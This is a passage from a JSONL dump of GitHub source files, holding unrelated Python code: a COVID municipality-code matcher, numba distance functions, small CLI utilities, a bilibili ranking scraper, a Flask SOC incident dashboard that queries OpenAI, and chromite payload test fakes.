Meta:\n\t\tverbose_name = 'Section'\n\t\tverbose_name_plural = 'Section'\n\t\tordering = ['scol','order']\n\n\tdef __unicode__(self):\n\t\treturn self.scol+str(self.order)\n\n","repo_name":"jazdelu/mbe","sub_path":"page/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15342069195","text":"#!/usr/bin/env python\n# Update the pre-matching locations.csv file for certain sources to find the correct\n# canonical hierarchy based on the Municipality Code that is stored in the Municipality\n# column for that source.\nimport csv\nimport sys\n\nfrom pylib.base.flags import Flags\n\nfrom config.br_covid.datatypes import Dimension, DimensionFactoryType\nfrom log import LOG\nfrom util.file.file_config import FileConfig, FilePattern, validate_file_configs\n\nMUNICIPALITY_COLUMN = f'{DimensionFactoryType.clean_prefix}{Dimension.MUNICIPALITY}'\n\n\ndef build_municipality_code_lookup(filename):\n '''Build a mapping from municipality code to the location dict that should be used\n for that code.\n '''\n # NOTE(stephen): BR has two municipality codes that we need to test for.\n short_code_mapping = {}\n long_code_mapping = {}\n with open(filename) as input_file:\n reader = csv.DictReader(input_file)\n for row in reader:\n # NOTE(stephen): Storing the clean-prefixed dimension name since that's what\n # the input source files will use.\n locations = {\n f'{DimensionFactoryType.clean_prefix}{dimension}': row[dimension]\n for dimension in DimensionFactoryType.hierarchical_dimensions\n }\n short_code_mapping[row['MunicipalityCodeShort']] = locations\n long_code_mapping[row['MunicipalityCodeLong']] = locations\n return (short_code_mapping, long_code_mapping)\n\n\ndef process_source(filename, short_code_mapping, long_code_mapping):\n output_rows = []\n header = []\n with open(filename) as input_file:\n reader = csv.DictReader(input_file)\n header = reader.fieldnames\n for row in reader:\n municipality_code = row[MUNICIPALITY_COLUMN]\n location = short_code_mapping.get(\n municipality_code\n ) or long_code_mapping.get(municipality_code)\n # applying treatment rules for unmatched municipalities\n if not location:\n municipality_code = str(municipality_code[:6])\n if municipality_code.startswith(\"53\"):\n municipality_code = \"530010\"\n else:\n municipality_code = municipality_code[:2] + \"0000\"\n location = short_code_mapping.get(municipality_code)\n if not location:\n LOG.warning(\n 'Cannot find location data for municipality code: %s',\n municipality_code,\n )\n location = {}\n output_rows.append({**row, **location})\n\n with open(filename, 'w') as output_file:\n writer = csv.DictWriter(output_file, fieldnames=header)\n writer.writeheader()\n writer.writerows(output_rows)\n\n\ndef main():\n Flags.PARSER.add_argument(\n '--input_basedir_pattern',\n type=str,\n required=True,\n help='Pattern to use to find dimension files for individual sources to '\n 'match.',\n )\n Flags.PARSER.add_argument(\n '--municipality_code_mapping_file',\n type=str,\n required=True,\n help='File with municpality codes mapping to full location hiearchy',\n )\n Flags.PARSER.add_argument(\n '--sources',\n nargs='+',\n type=str,\n required=True,\n help='List of sources to process',\n )\n Flags.InitArgs()\n\n # NOTE(stephen): The original locations.csv file will be overwritten *in place* for\n # the sources provided.\n input_pattern = FilePattern(Flags.ARGS.input_basedir_pattern)\n (short_code_mapping, long_code_mapping) = build_municipality_code_lookup(\n Flags.ARGS.municipality_code_mapping_file\n )\n\n for source in Flags.ARGS.sources:\n LOG.info('Processing %s', source)\n process_source(\n input_pattern.build(source), short_code_mapping, long_code_mapping\n )\n LOG.info('Finished processing sources')\n\n return 0\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"Zenysis/br-training","sub_path":"pipeline/brazil_covid/bin/shared/match_municipality_code.py","file_name":"match_municipality_code.py","file_ext":"py","file_size_in_byte":4023,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"33997558130","text":"\"\"\"Isolated numba imports for _euclidean.\"\"\"\n\n__author__ = [\"chrisholder\", \"TonyBagnall\"]\n\nimport numpy as np\n\nfrom sktime.utils.numba.njit import njit\n\n\n@njit(cache=True, fastmath=True)\ndef _local_euclidean_distance(x, y):\n \"\"\"Compute the local euclidean distance.\n\n Parameters\n ----------\n x: np.ndarray (1d array)\n First time series\n y: np.ndarray (1d array)\n Second time series\n\n Returns\n -------\n float\n Euclidean distance between the two time series\n \"\"\"\n distance = 0.0\n for i in range(x.shape[0]):\n difference = x[i] - y[i]\n distance += difference * difference\n\n return np.sqrt(distance)\n\n\n@njit(cache=True, fastmath=True)\ndef _numba_euclidean_distance(x: np.ndarray, y: np.ndarray) -> float:\n \"\"\"Euclidean distance compiled to no_python.\n\n Parameters\n ----------\n x: np.ndarray (2d array shape (d,m))\n First time series.\n y: np.ndarray (2d array shape (d,m))\n Second time series.\n\n Returns\n -------\n distance: float\n Euclidean distance between x and y.\n \"\"\"\n distance = 0.0\n for i in range(x.shape[0]):\n for j in range(x.shape[1]):\n difference = x[i][j] - y[i][j]\n distance += difference * difference\n return np.sqrt(distance)\n","repo_name":"sktime/sktime","sub_path":"sktime/distances/_euclidean_numba.py","file_name":"_euclidean_numba.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":7028,"dataset":"github-code","pt":"52"} +{"seq_id":"72623569764","text":"import logging\nimport os\n\nfrom flatpaksync.flatpakcmd import flatpakcmd\n\nmylog = logging.getLogger(\"fps\")\n\nclass command():\n\n def __init__(self):\n self.dryrun = False\n\n logging.basicConfig(format='%(levelname)s: %(message)s', level=logging.INFO)\n\n self.conf = os.environ['HOME'] + '/' + \".config/flatpak-sync/flatpak.json\"\n\n\n def setConfig(self, conf):\n if not conf.endswith(\".config/flatpak-sync/flatpak.json\"):\n self.conf = conf\n\n\n def setDebug(self, isVerbose):\n if isVerbose:\n mylog.setLevel(logging.DEBUG)\n mylog.debug(\"Verbose mode enabled\")\n else:\n mylog.setLevel(logging.INFO)\n\n\n def setDryRun(self, isDryrun):\n self.dryrun = isDryrun\n\n\n def checkFlatpak(self):\n fp = flatpakcmd()\n if fp.isInstalled() == False:\n sys.exit(\"Unable to find flatpak! Are you sure flatpak is installed?\")\n \n mylog.debug(\"Flatpak installed: {}\".format(fp.isInstalled()))\n mylog.debug(fp.getVersion())\n mylog.debug(\"Configuration file: {}\".format(self.conf))\n\n\n","repo_name":"jeteokeeffe/flatpak-sync","sub_path":"flatpaksync/commands/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"52"} +{"seq_id":"7043314364","text":"# github.com/bryangoodrich/python-exercises\n# code/0006/0006.py\n\ndef use_state(initial_state):\n state = initial_state\n\n def set_state(new_state):\n nonlocal state\n state[\"value\"] = new_state\n\n return state, set_state\n\ncount, set_count = use_state({\"value\": 0})\nprint(count[\"value\"]) # Output: 0\n\nincrement = lambda: set_count(count[\"value\"] + 1)\ndecrement = lambda: set_count(count[\"value\"] - 1)\n\nincrement() # 1\nincrement() # 2\ndecrement() # 1\n\nprint(count[\"value\"])\n# 1\n","repo_name":"bryangoodrich/python-exercises","sub_path":"code/0006/0006.py","file_name":"0006.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"16069528761","text":"#! python3\n\"\"\"\nwrite by liucz 2015-10-7\nimitate 'tr' command in Linux Shell\n\"\"\"\n\nimport sys\nimport re\nimport argparse\nfrom handle_stdin import echoLines, storeLines\nfrom handle_string import delete, unique, complement, complementUnique, escaped\n\n\ndef buildParser():\n\tparser = argparse.ArgumentParser()\n\n\tparser.add_argument('-c', '--complement',\n\t\t\t\t\t\taction = 'store_true',\n\t\t\t\t\t\thelp = 'replace all those chars not in src by the single char of rep')\n\tparser.add_argument('-d', '--delete',\n\t\t\t\t\t\taction = 'store_true',\n\t\t\t\t\t\thelp = 'delete all those chars in src')\n\tparser.add_argument('-s', '--squeeze',\n\t\t\t\t\t\taction = 'store_true',\n\t\t\t\t\t\thelp = 'remove redundant continuous repeated chars in src or ' \n\t\t\t\t\t\t\t 'replace continuous repeated chars in src by corresponding char in rep')\n\tparser.add_argument('-t', '--truncate',\n\t\t\t\t\t\taction = 'store_true',\n\t\t\t\t\t\thelp = 'truncate src if len(src) > len(rep) otherwise use last char in rep if len(src) > len(rep)')\n\tparser.add_argument('src',\n\t\t\t\t\t\tnargs = 1,\n\t\t\t\t\t\thelp = 'source char set')\n\tparser.add_argument('rep',\n\t\t\t\t\t\tnargs = '?',\n\t\t\t\t\t\thelp = 'replace char set')\n\t# parser.add_help()\n\treturn parser\n\n\ndef processArgs(args):\n\targs.src = args.src[0]\n\t# print('src = ', args.src)\n\targs.src = escaped(args.src)\n\t# print('src = ', args.src)\n\t\n\t# if args.complement:\n\t# \tif not args.delete and args.rep is None:\n\t# \t\tsys.stderr.write('tr.py: rep must be given when translating\\n')\n\t# \t\treturn False\n\n\tif args.truncate:\n\t\tif args.rep is None:\n\t\t\tsys.stderr.write('tr.py: rep must be given when truncating\\n')\n\t\t\treturn False\n\n\tif args.delete:\n\t\tif args.rep is not None:\n\t\t\tsys.stderr.write('tr.py: rep is ignored when deleting\\n')\n\n\t# check src and rep\n\tif args.rep is not None:\n\t\t# print('rep = ', args.rep)\n\t\targs.rep = escaped(args.rep)\n\t\t# print('rep = ', args.rep)\n\n\t\trepLen = len(args.rep)\n\t\tsrcLen = len(args.src)\n\t\tif srcLen > repLen:\n\t\t\tif args.truncate:\n\t\t\t\targs.src = args.src[:repLen]\n\t\t\telse:\n\t\t\t\targs.rep += args.rep[-1] * (srcLen - repLen)\n\t\telif srcLen < repLen:\n\t\t\targs.rep = args.rep[:srcLen]\n\n\treturn True\n\n\ndef doDelete(targetSet):\n\t# print(\"doDelete\")\n\t# print(targetSet)\n\tmeetEOF = False\n\twhile not meetEOF:\n\t\tlines, meetEOF = storeLines(1)\n\t\tif lines:\n\t\t\tprint(delete(lines[0], targetSet), end = '')\n\n\ndef doComplementDelete(keepSet):\n\t# print(\"doComplementDelete\")\n\tmeetEOF = False\n\twhile not meetEOF:\n\t\tlines, meetEOF = storeLines(1)\n\t\tif lines:\n\t\t\tprint(complement(lines[0], keepSet, ''), end = '')\n\n\ndef doSqueeze(src, rep):\n\t# print(\"doSqueeze\")\n\ttransformTable = None\n\tif rep:\n\t\ttransformTable = {src[i]:rep[i] for i in range(len(src))}\n\tmeetEOF = False\n\twhile not meetEOF:\n\t\tlines, meetEOF = storeLines(1)\n\t\tif lines:\n\t\t\tprint(unique(lines[0], transformTable), end = '')\n\n\ndef doComplementSqueeze(src, rep):\n\t# print(\"doComplementSqueeze\")\n\t# print('rep = %s' % rep)\n\tkeepSet = set(src)\n\tmeetEOF = False\n\twhile not meetEOF:\n\t\tlines, meetEOF = storeLines(1)\n\t\tif lines:\n\t\t\tprint(complementUnique(lines[0], keepSet, None, rep), end = '')\n\n\ndef main():\n\tparser = buildParser()\n\targs = parser.parse_args()\n\t# print(args)\n\tif not processArgs(args):\n\t\treturn\n\n\tif args.delete:\n\t\tif args.complement:\n\t\t\t# delete those not in src\n\t\t\tdoComplementDelete(set(args.src))\n\t\telse:\n\t\t\t# delete those in src\n\t\t\tdoDelete(set(args.src))\n\n\telif args.squeeze:\n\t\tif args.complement:\n\t\t\tdoComplementSqueeze(args.src, args.rep)\n\t\telse:\n\t\t\tdoSqueeze(args.src, args.rep)\n\telse:\n\t\techoLines(-1, tillEOF = True)\n\n\n# entry\nif __name__ == '__main__':\n\tmain()","repo_name":"uuuouou/PythonBash","sub_path":"tr.py","file_name":"tr.py","file_ext":"py","file_size_in_byte":3510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70111505124","text":"'''\nFaça um programa que una duas listas aleatórias de inteiros, com 100 entradas, e\ndiga quais números são primos e em que posição eles aparecem.\n'''\n\nimport random\nlista1 = []\nlista2 = []\nlista3 = []\nprimos = []\nqtd = 0;\nfor i in range(100):\n lista1.append(random.randint(1, 1000))\n\nfor i in range(100):\n lista2.append(random.randint(1, 1000))\n\nlista3 = lista1+lista2\n\ntamanho = len(lista3)\nfor i in range(tamanho):\n if ((lista3[i] % 2 == 0) and (lista3[i] != 2)) or \\\n ((lista3[i] % 3 == 0) and (lista3[i] != 3)) or \\\n ((lista3[i] % 5 == 0) and (lista3[i] != 5)) or \\\n ((lista3[i] % 7 == 0) and (lista3[i] != 7)):\n qtd +=0\n elif lista3[i] > 1:\n qtd += 1\n primos.append(lista3[i])\nprint (f'da lista {sorted(lista3)}\\nTemos {qtd} numero(s) Primos')\nprint (f'{sorted(primos)}')","repo_name":"FllavioAndrade/exercicio-python","sub_path":"ufrn-poo/aula-5/exercicio-6.py","file_name":"exercicio-6.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22188205272","text":"#%%\nimport conjuntos\nimport textHandler\n#%%\nnConjuntos = 0\nuniverso = {}\nwhile True:\n print (\"Ingresa los elementos del conjunto \", chr(nConjuntos+65), \": ( para terminar)\") #mejor separados por comma, solo preguntar nombre del conjunto\n temp = set()\n valor = input()\n temp.update(valor.split(','))\n if(len(valor) == 0):\n break\n universo[chr(nConjuntos+65)] = conjuntos.setToList(temp)\n nConjuntos += 1\noperadoresNom = ['unión', 'intersección','producto cartesiano', 'diferencia', 'diferencia simetrica', 'conjunto potencia']\nprint (\"Simbología\")\nfor i in range(len(operadoresNom)):\n print(textHandler.operadores[i],\": \",operadoresNom[i])\n\n\n\n\n\n#%%\nprint(universo)\nwhile True:\n #operadores = ['u', '^', 'x', '-', '+', 'p']\n print (\"Ingresa una operación con conjutos: \")\n operacion = input() # u(A,B)\n if(len(operacion) == 0):\n break\n operacion = operacion.replace(\" \", \"\")\n try:\n head = textHandler.makeTree(operacion)\n head.doMath(universo)\n print(head.valor)\n except:\n print(\"Sintaxis incorrecta en la operación: \",operacion)\n\n# %%\n","repo_name":"JuanGuerreroUP/Conjuntos","sub_path":"conjuntosProyecto.py","file_name":"conjuntosProyecto.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38165215656","text":"# -*- coding: utf-8 -*-\n\nimport json\nfrom functools import reduce\nfrom math import floor\nfrom os import listdir, remove\nfrom os.path import abspath\n\nimport arrow\nimport requests\nfrom pandas import read_excel\n\nWEEKS = floor(\n (int(arrow.now(\"Asia/Shanghai\").timestamp()) - 1428681600) / 3600 / 24 / 7\n)\n\n\ndef getcover(aid):\n headers = {\n \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36\",\n }\n params = {\n \"aid\": aid,\n }\n resp = requests.get(\n \"https://api.bilibili.com/x/web-interface/view\", params=params, headers=headers\n )\n result = json.loads(resp.content)\n if result.get(\"code\") == 0:\n origin = result[\"data\"].get(\"title\")\n return {\n aid: {\n \"pic\": result[\"data\"].get(\"pic\"),\n \"pubdate\": arrow.get(\n result[\"data\"].get(\"pubdate\"), tzinfo=\"Asia/Shanghai\"\n ).format(\"YYYY-MM-DD HH:mm\"),\n \"title\": origin,\n \"duration\": result[\"data\"].get(\"duration\"),\n \"owner\": result[\"data\"][\"owner\"].get(\"name\"),\n }\n }\n else:\n print(f\"av{aid} 封面获取失败:{result}\")\n return {\n aid: {\n \"pic\": None,\n \"pubdate\": result.get(\"code\"),\n \"title\": None,\n \"duration\": -1,\n \"owner\": \"\",\n }\n }\n\n\ndef downcover(rank, aid, link):\n try:\n response = requests.get(f\"{link}@640w_400h.jpg\")\n except requests.exceptions.MissingSchema:\n print(f\"requests.exceptions.MissingSchema: av{aid}\\n\")\n return None\n with open(f\"./COVER/{rank}_av{aid}.jpg\", \"wb\") as f:\n f.write(response.content)\n\n\ndef readExcel(filename):\n print(f\"\\n加载文件\\n\\t{abspath(filename)}\")\n df = read_excel(filename)\n print(f\"\\n加载文件\\n\\t{abspath('周刊除外.csv')}\")\n ex_aids = [int(line.strip(\"\\n\")) for line in open(\"周刊除外.csv\", \"r\")]\n for aid in ex_aids:\n exclude = df.loc[df[\"av\"] == aid].index\n df = df.drop(exclude)\n df = df.sort_index().reset_index(drop=True)\n if \"pubdate\" in df.columns:\n pass\n else:\n df.insert(0, \"pubdate\", [0] * len(df.index))\n if \"duration\" in df.columns:\n pass\n else:\n df.insert(0, \"duration\", [0] * len(df.index))\n if \"offset\" in df.columns:\n pass\n else:\n df.insert(0, \"offset\", [0] * len(df.index))\n df = df.astype({\"offset\": \"int\"})\n for x in df.index:\n df.at[x, \"rank\"] = int(x + 1)\n\n print(\"\\n获取视频封面...\")\n covers = reduce(\n lambda x, y: {**x, **y},\n [\n getcover(int(df.at[x, \"av\"]))\n for x in df.index\n if df.at[x, \"av\"] != \"av\" and df.at[x, \"rank\"] <= 150\n ],\n )\n\n for x in df.index:\n if df.at[x, \"rank\"] <= 150:\n df.at[x, \"pubdate\"] = covers[int(df.at[x, \"av\"])][\"pubdate\"]\n df.at[x, \"duration\"] = covers[int(df.at[x, \"av\"])][\"duration\"]\n df.at[x, \"title\"] = (\n covers[int(df.at[x, \"av\"])][\"title\"]\n if covers[int(df.at[x, \"av\"])][\"title\"] is not None\n else df.at[x, \"title\"]\n )\n\n for file in listdir(\"./COVER/\"):\n remove(f\"./COVER/{file}\")\n list(\n map(\n downcover,\n [\n int(df.at[x, \"rank\"])\n for x in df.index\n if df.at[x, \"rank\"] != \"rank\"\n and df.at[x, \"rank\"] <= 100\n and df.at[x, \"rank\"] > 20\n ],\n [\n int(df.at[x, \"av\"])\n for x in df.index\n if df.at[x, \"av\"] != \"av\"\n and df.at[x, \"rank\"] <= 100\n and df.at[x, \"rank\"] > 20\n ],\n [\n covers[int(df.at[x, \"av\"])][\"pic\"]\n for x in df.index\n if df.at[x, \"av\"] != \"av\"\n and df.at[x, \"rank\"] <= 100\n and df.at[x, \"rank\"] > 20\n ],\n )\n )\n df.to_excel(f\"{WEEKS:03d}期数据.xlsx\", index=False)\n with open(\"./psdownload/download.txt\", \"w\", encoding=\"utf-8\") as f:\n f.writelines([f\"av{x}\\n\" for x in df[0:20][\"av\"].tolist()])\n with open(f\"./DATA/{WEEKS:03d}期数据.json\", \"w\", encoding=\"utf-8\") as f:\n df[0:100].to_json(f, orient=\"records\", force_ascii=False)\n\n\ndef pickup():\n table = \"fZodR9XQDSUm21yCkr6zBqiveYah8bt4xsWpHnJE7jL5VG3guMTKNPAwcF\"\n tr = {}\n for i in range(58):\n tr[table[i]] = i\n s = [11, 10, 3, 8, 4, 6]\n xor = 177451812\n add = 8728348608\n\n def dec(x):\n r = 0\n for i in range(6):\n r += tr[x[s[i]]] * 58**i\n return (r - add) ^ xor\n\n pickups = [\n line.strip(\"\\n\")\n for line in open(\"pickup.txt\", \"r\", encoding=\"utf-8\")\n if line.strip(\"\\n\") != \"\"\n ]\n\n infos = reduce(\n lambda x, y: {**x, **y},\n [getcover(dec(pickups[4 * x])) for x in range(len(pickups) // 4)],\n )\n with open(\"./psdownload/download.txt\", \"a\", encoding=\"utf-8\") as f:\n f.writelines([f\"av{x}\\n\" for x in infos.keys()])\n jsondata = [\n {\n \"rank\": -(x + 4) if x < len(pickups) // 8 else -(x - 1),\n \"av\": dec(pickups[4 * x + 0]),\n \"offset\": 0,\n \"title\": infos[dec(pickups[4 * x + 0])][\"title\"],\n \"up\": infos[dec(pickups[4 * x + 0])][\"owner\"],\n \"pubdate\": infos[dec(pickups[4 * x + 0])][\"pubdate\"],\n \"type\": f\"{pickups[4 * x + 1]}\\\\n\\\\n{pickups[4 * x + 2]}\",\n \"comment\": pickups[4 * x + 3],\n }\n for x in range(len(pickups) // 4)\n ]\n return jsondata\n\n\ndef olddata():\n rankdata = {}\n offsetdata = {}\n for w in range(376, WEEKS):\n last = json.load(open(f\"./DATA/{w:03d}期数据.json\", \"r\", encoding=\"utf-8\"))\n rankdata = {**rankdata, **{x[\"av\"]: x[\"rank\"] for x in last if x[\"rank\"] > 0}}\n offsetdata = {\n **offsetdata,\n **{x[\"av\"]: x[\"offset\"] for x in last if x[\"offset\"] != 0},\n }\n return rankdata, offsetdata\n\n\ndef rankdoor():\n rank = json.load(open(f\"./DATA/{WEEKS:03d}期数据.json\", \"r\", encoding=\"utf-8\"))\n result = [\n [\n x[\"rank\"],\n f\"av{x['av']}\",\n ]\n for x in rank\n if x[\"rank\"] <= 20\n ]\n result.sort(key=lambda z: z[0], reverse=True)\n with open(\"rankdoor.csv\", \"w\", encoding=\"utf-8-sig\") as f:\n for x in result:\n f.write(f\"{x[0] if x[0] > 0 else '旧作' if x[0] >= -3 else '新作'},{x[1]}\\n\")\n\n\ndef main():\n readExcel(f\"{WEEKS}期数据.xlsx\")\n this = json.load(open(f\"./DATA/{WEEKS:03d}期数据.json\", \"r\", encoding=\"utf-8\"))\n last_rank, last_offset = olddata()\n for x in this:\n if last_rank.get(x[\"av\"]) and last_rank.get(x[\"av\"]) > 0:\n x[\"last\"] = last_rank.get(x[\"av\"])\n x[\"offset\"] = last_offset.get(x[\"av\"])\n else:\n x[\"last\"] = \"null\"\n this += pickup()\n json.dump(\n this,\n open(f\"./DATA/{WEEKS:03d}期数据.json\", \"w\", encoding=\"utf-8\"),\n ensure_ascii=False,\n indent=4,\n )\n rankdoor()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Neutralization/MADRankingScripts","sub_path":"tojson.py","file_name":"tojson.py","file_ext":"py","file_size_in_byte":7317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25937632361","text":"import codecs\nimport csv\nimport os\nimport requests\nimport openai\nfrom flask import Flask, render_template, jsonify, request\nfrom collections import defaultdict\nfrom datetime import datetime\nfrom dotenv import load_dotenv\n\napp = Flask(__name__)\nload_dotenv()\n\n#column definition\ncol_log_source = \"fields.customfield_10223\"\ncol_created = \"fields.created\"\ncol_issue_key = \"key\"\ncol_summary = \"fields.summary\"\n\n# col_log_source = \"Custom field (Log Source Domain)\"\n# col_created = \"Created\"\n# col_issue_key = \"Issue key\"\n# col_summary = \"Summary\"\n\nopenai.api_key = os.getenv(\"OPENAI_API_KEY\")\ncsv_file = os.getenv(\"DASHBOARD_DATASOURCE_CSV_PATH\") # Replace with your CSV file path\ndef parse_csv(file_path):\n incidents = defaultdict(lambda: defaultdict(lambda: {\"count\": 0, \"items\": []}))\n dates = set() # Collect unique dates\n\n with codecs.open(file_path, 'r', encoding='latin-1') as file: # Specify the correct encoding\n reader = csv.DictReader(file)\n # print(\"Length of row:\", len(reader)) # Print the length of sorted_dates\n\n for row in reader:\n print(row)\n customer = row[col_log_source]\n if row[col_created]:\n datetime_string = row[col_created]\n\n # Convert the datetime string to a datetime object\n datetime_obj = datetime.strptime(datetime_string, \"%Y-%m-%dT%H:%M:%S.%f%z\")\n\n # Extract the date portion\n date_only = datetime_obj.date()\n created = date_only\n # created = row[col_created].split()[0] # Extract the date only\n else :\n created = \"\"\n incidents[customer][created][\"count\"] += 1\n incidents[customer][created][\"items\"].append({\n \"issue_key\": row[col_issue_key],\n \"summary\": row[col_summary],\n # \"Custom field (Actual time to first response)\": row[\"Custom field (Actual time to first response)\"],\n # \"Custom field (Raw Alert)\": row[\"Custom field (Raw Alert)\"],\n })\n dates.add(created) # Collect unique dates\n\n sorted_dates = sorted(dates) # Sort the dates\n\n return dict(incidents), sorted_dates\n\n\n@app.route('/')\ndef incident_table():\n incidents, sorted_dates = parse_csv(csv_file)\n return render_template('dashboard.html', incidents=dict(incidents), dates=sorted_dates)\n\n\n@app.route('/convert-to-csv', methods=['POST'])\ndef convert_to_csv():\n table_data = request.json['tableData']\n csv_data = '\\n'.join(','.join(map(str, row)) for row in table_data)\n print(f'csv_data: {csv_data}')\n # response = requests.post('http://openai.com/completion', json={\"string\": csv_data})\n\n # +++\n\n conversation2 = []\n # conversation2.append({\"role\": \"user\", \"content\": \"Hello OpenAI\"})\n prompt = f\"\"\"\n I'm working for a security operation center and i have an incident table below.\n they are incidents of the same customer\n please look for me if there's any particular trend in the incidents today\n anything my SOC analysts should be alert\n also give the count for each group / type of incidents\n {csv_data}\n \"\"\"\n conversation2.append({\"role\": \"user\", \"content\": prompt})\n\n\n response2 = openai.ChatCompletion.create(\n # model='gpt-3.5-turbo',\n model='gpt-3.5-turbo',\n messages=conversation2\n )\n\n ai_response2 = response2.choices[0].message.content\n # ---\n print('chkpt3')\n # response_data = response.json()\n # return jsonify(response_data['data'])\n return {\n \"data\": ai_response2\n }\n\n@app.route('/investigate', methods=['POST'])\ndef investigate():\n data = request.get_json()\n print('investigate:', data) # Updated print statement\n # Perform investigation based on the provided data\n # ...\n # Replace the following example response with your actual investigation result\n\n # response = requests.post('http://openai.com/completion', json={\"string\": csv_data})\n\n # +++\n\n conversation2 = []\n # conversation2.append({\"role\": \"user\", \"content\": \"Hello OpenAI\"})\n prompt = f\"\"\"\n I'm working for a security operation center and i have an incident table below.\n they are incidents of the same customer\n help me to propose how to investigate the below incident ticket\n {data}\n \"\"\"\n conversation2.append({\"role\": \"user\", \"content\": prompt})\n\n\n response2 = openai.ChatCompletion.create(\n model='gpt-3.5-turbo',\n messages=conversation2\n )\n\n ai_response2 = response2.choices[0].message.content\n\n investigation_result = {\n \"description\": ai_response2,\n \"proposedFix\": \"Proposed fix for the issue\"\n }\n return jsonify(investigation_result)\n\nif __name__ == '__main__':\n port = int(os.environ.get('PORT', 3000))\n app.run(host='0.0.0.0', port=port)\n","repo_name":"ashvanje/soc-ticket-insight-dashboard","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12536477375","text":"from __future__ import print_function\n\nimport collections\nimport sys\n\nfrom chromite.lib import constants\nfrom chromite.cli.cros import cros_payload\nfrom chromite.lib import cros_test_lib\n\n# Needed for the update_payload import below.\nsys.path.insert(0, constants.UPDATE_ENGINE_SCRIPTS_PATH)\n\n# TODO(alliewood)(chromium:454629) update once update_payload is moved\n# into chromite\nimport update_payload\nfrom update_payload import update_metadata_pb2\n\nclass FakePayloadError(Exception):\n \"\"\"A generic error when using the FakePayload.\"\"\"\n\nclass FakeOption(object):\n \"\"\"Fake options object for testing.\"\"\"\n\n def __init__(self, **kwargs):\n self.list_ops = False\n self.stats = False\n self.signatures = False\n for key, val in kwargs.iteritems():\n setattr(self, key, val)\n if not hasattr(self, 'payload_file'):\n self.payload_file = None\n\nclass FakeOp(object):\n \"\"\"Fake manifest operation for testing.\"\"\"\n\n def __init__(self, src_extents, dst_extents, op_type, **kwargs):\n self.src_extents = src_extents\n self.dst_extents = dst_extents\n self.type = op_type\n for key, val in kwargs.iteritems():\n setattr(self, key, val)\n\n def HasField(self, field):\n return hasattr(self, field)\n\nclass FakePartition(object):\n \"\"\"Fake PartitionUpdate field for testing.\"\"\"\n\n def __init__(self, partition_name, operations):\n self.partition_name = partition_name\n self.operations = operations\n\nclass FakeManifest(object):\n \"\"\"Fake manifest for testing.\"\"\"\n\n def __init__(self, major_version):\n FakeExtent = collections.namedtuple('FakeExtent',\n ['start_block', 'num_blocks'])\n self.install_operations = [FakeOp([],\n [FakeExtent(1, 1), FakeExtent(2, 2)],\n update_payload.common.OpType.REPLACE_BZ,\n dst_length=3*4096,\n data_offset=1,\n data_length=1)]\n self.kernel_install_operations = [FakeOp(\n [FakeExtent(1, 1)],\n [FakeExtent(x, x) for x in xrange(20)],\n update_payload.common.OpType.SOURCE_COPY,\n src_length=4096)]\n if major_version == cros_payload.MAJOR_PAYLOAD_VERSION_BRILLO:\n self.partitions = [FakePartition('rootfs', self.install_operations),\n FakePartition('kernel',\n self.kernel_install_operations)]\n self.install_operations = self.kernel_install_operations = []\n self.block_size = 4096\n self.minor_version = 4\n FakePartInfo = collections.namedtuple('FakePartInfo', ['size'])\n self.old_rootfs_info = FakePartInfo(1 * 4096)\n self.old_kernel_info = FakePartInfo(2 * 4096)\n self.new_rootfs_info = FakePartInfo(3 * 4096)\n self.new_kernel_info = FakePartInfo(4 * 4096)\n self.signatures_offset = None\n self.signatures_size = None\n\n def HasField(self, field_name):\n \"\"\"Fake HasField method based on the python members.\"\"\"\n return hasattr(self, field_name) and getattr(self, field_name) is not None\n\nclass FakeHeader(object):\n \"\"\"Fake payload header for testing.\"\"\"\n\n def __init__(self, version, manifest_len, metadata_signature_len):\n self.version = version\n self.manifest_len = manifest_len\n self.metadata_signature_len = metadata_signature_len\n\n @property\n def size(self):\n return (20 if self.version == cros_payload.MAJOR_PAYLOAD_VERSION_CHROMEOS\n else 24)\n\n\nclass FakePayload(object):\n \"\"\"Fake payload for testing.\"\"\"\n\n def __init__(self, major_version):\n self._header = FakeHeader(major_version, 222, 0)\n self.header = None\n self._manifest = FakeManifest(major_version)\n self.manifest = None\n\n self._blobs = {}\n self._payload_signatures = update_metadata_pb2.Signatures()\n self._metadata_signatures = update_metadata_pb2.Signatures()\n\n def Init(self):\n \"\"\"Fake Init that sets header and manifest.\n\n Failing to call Init() will not make header and manifest available to the\n test.\n \"\"\"\n self.header = self._header\n self.manifest = self._manifest\n\n def ReadDataBlob(self, offset, length):\n \"\"\"Return the blob that should be present at the offset location\"\"\"\n if not offset in self._blobs:\n raise FakePayloadError('Requested blob at unknown offset %d' % offset)\n blob = self._blobs[offset]\n if len(blob) != length:\n raise FakePayloadError('Read blob with the wrong length (expect: %d, '\n 'actual: %d)' % (len(blob), length))\n return blob\n\n @staticmethod\n def _AddSignatureToProto(proto, **kwargs):\n \"\"\"Add a new Signature element to the passed proto.\"\"\"\n new_signature = proto.signatures.add()\n for key, val in kwargs.iteritems():\n setattr(new_signature, 